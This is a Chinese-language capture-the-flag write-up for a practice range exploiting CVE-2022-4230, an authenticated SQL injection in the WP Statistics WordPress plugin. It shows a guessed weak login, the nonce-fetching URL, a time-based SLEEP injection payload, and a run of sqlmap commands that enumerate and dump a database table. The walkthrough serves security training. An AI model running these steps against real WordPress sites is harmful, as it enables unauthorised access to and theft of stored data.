靶标介绍
WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。
开启靶场
开启靶场之后,发现什么都没有,所以我们进行目录扫描,这里我使用的是御剑目录扫描工具
访问 license.txt 无收获,访问 resdme.html 发现以下页面
http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/readme.html
点击 login page,发现了一个登录页面
试了用户名和密码是 admin 之后并无发现,左下角有一个“返回到 test”,说明 test 大概率是用户,尝试登录一下
发现登录成功了
wpscan漏洞介绍
根据靶标介绍,这里有插件漏洞,链接:WP Statistics < 13.2.9 – 经过身份验证的 SQLi |CVE 2022-4230 |插件漏洞 (wpscan.com),有兴趣可以了解下
意思大概是这样的:以允许查看WP统计信息的用户身份登录,并通过获取随机数“https://xxx.com/wp-admin/admin-ajax.php?action=rest-nonce”,并在下面的URL中使用它,该URL将延迟5s
首先通过访问,获得随机数(必须要先登录过后台才行)
http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=rest-nonce
获得随机数之后,把随机数添加到下面那个 URL 中,访问一下试试,这里就不加“%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR”了,不加这条语句不影响最终结果
http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/wp-json/wp-statistics/v2/metabox?_wpnonce=16139d290f&name=words&search_engine=aaa
访问之后发现了这个页面,然后用 Burp 抓个包吧
把数据包复制到一个文本里,重命名为 test.txt 拖进 kali 桌面,在桌面打开终端使用 sqlmap 工具跑一下
sqlmap -r test.txt --batch --dbs
发现了 wordpress 敏感数据库
查询数据库表名
sqlmap -r test.txt --batch -D wordpress --tables
发现了一个 flag 表
查询表中字段名
sqlmap -r test.txt --batch -D wordpress -T flag --columns
发现字段名是 flag
查询字段下数据
sqlmap -r test.txt --batch -D wordpress -T flag -C flag --dump
发现了 flag
版权归原作者 燕雀安知鸿鹄之志哉. 所有, 如有侵权,请联系我们删除。